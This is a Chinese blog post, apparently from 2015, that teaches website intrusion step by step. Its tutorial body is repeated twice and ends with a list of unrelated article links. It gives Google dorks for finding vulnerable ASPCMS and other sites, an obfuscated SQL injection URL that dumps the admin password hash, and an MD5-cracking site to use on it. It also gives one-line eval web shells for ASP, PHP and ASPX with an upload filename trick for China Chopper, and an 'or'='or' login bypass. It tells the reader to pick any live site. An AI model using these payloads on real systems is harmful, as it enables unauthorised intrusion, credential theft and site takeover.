渗透(龙帝)
2015-08-11 21:19
861 查看
一、Powered by aspcms.com Copyright ?2010-2011
步奏1.
首先谷歌关键字 Powered by aspcms.com Copyright ?2010-2011
步奏2.
可以看到有许多站 随便进去一个
接着利用注入漏洞
/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user
把这段文字添加到域名后面 比如 www.kastas.cn 就把这段文字添加到这个cn后面
显示:
发表于:2014-4-26 8:26:00 评论者:admin IP:
ea42f1bc4322ef9d
首页上一页1下一页末页
ea42f1bc4322ef9d 这个就是网站密码 我们去解这个密码 http://pmd5.com/?action=getpwd
明文:ella98744
步奏3.
去登陆后台
********************************************************************************
原理1.
Powered by aspcms.com Copyright ?2010-2011 注入原理
(wait)
原理2.
MD5破解网站
http://md5.syue.com/OtherSite-md5.Asp
二、织梦内容管理系统 V57_GBK_SP1
方法:织梦通杀工具
三、中国菜刀
步奏1.
<%eval request("520")%> 这个一句话木马 放在记事本里 然后另存为
然后保存类型 选择为所有文件 文件名 为l.asp;.jpg 也就是桌面上那个
好了 把这个上传
步奏2.
用菜刀连接了
原理
菜刀
参考 http://huaidan.org/archives/3472.html
Asp环境:<%eval request("a")%>
Php环境:<?php @eval($_POST['a']);?>
Aspx环境:<% @page Language="Jscript"><%eval(Request.item["a"],"unsafe");%>
四、inurl:download_ok.asp?
步奏1.
关键字:inurl:download_ok.asp?
步奏2.后台
/admin
账户名和密码 输入 'or'='or'
*扩展
漏洞
http://www.ihonker.org/forum.php?mod=viewthread&tid=5303&extra=page=1&orderby=dateline
后台
http://www.myhack58.com/Article/html/3/8/2014/49569.htm
步奏1.
首先谷歌关键字 Powered by aspcms.com Copyright ?2010-2011
步奏2.
可以看到有许多站 随便进去一个
接着利用注入漏洞
/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user
把这段文字添加到域名后面 比如 www.kastas.cn 就把这段文字添加到这个cn后面
显示:
发表于:2014-4-26 8:26:00 评论者:admin IP:
ea42f1bc4322ef9d
首页上一页1下一页末页
ea42f1bc4322ef9d 这个就是网站密码 我们去解这个密码 http://pmd5.com/?action=getpwd
明文:ella98744
步奏3.
去登陆后台
********************************************************************************
原理1.
Powered by aspcms.com Copyright ?2010-2011 注入原理
(wait)
原理2.
MD5破解网站
http://md5.syue.com/OtherSite-md5.Asp
二、织梦内容管理系统 V57_GBK_SP1
方法:织梦通杀工具
三、中国菜刀
步奏1.
<%eval request("520")%> 这个一句话木马 放在记事本里 然后另存为
然后保存类型 选择为所有文件 文件名 为l.asp;.jpg 也就是桌面上那个
好了 把这个上传
步奏2.
用菜刀连接了
原理
菜刀
参考 http://huaidan.org/archives/3472.html
Asp环境:<%eval request("a")%>
Php环境:<?php @eval($_POST['a']);?>
Aspx环境:<% @page Language="Jscript"><%eval(Request.item["a"],"unsafe");%>
四、inurl:download_ok.asp?
步奏1.
关键字:inurl:download_ok.asp?
步奏2.后台
/admin
账户名和密码 输入 'or'='or'
*扩展
漏洞
http://www.ihonker.org/forum.php?mod=viewthread&tid=5303&extra=page=1&orderby=dateline
后台
http://www.myhack58.com/Article/html/3/8/2014/49569.htm
相关文章推荐
- EL标签库
- 【leetcode】Delete Node in a Linked List【java】
- 记录编译安装Tengine+PHP-FPM运行 WordPress 的过程.
- 命令历史:bash的特性之一
- 快速排序容易理解版
- 非整除序列
- 2015/8/11/单例/MVC/Web Servlet/事务
- JDBC学习小结
- 软件测试的总结01
- Java常见问题3:周期之谜
- MySQL的分页
- C语言基础01
- OpenGL ES 画球
- ADAM4015应用笔记
- httpclient中使用HTTPS的方法
- hdoj2122Ice_cream’s world III
- 【屌丝程序的口才逆袭演讲稿50篇】第十三篇:爱迪生欺骗了我们!【张振华.Jack】
- leetcode Merge Two Sorted Lists
- HDOJ 1102 Constructing Roads 最小生成树 kruskal && Prim
- Zookeeper之观察机制(配置服务)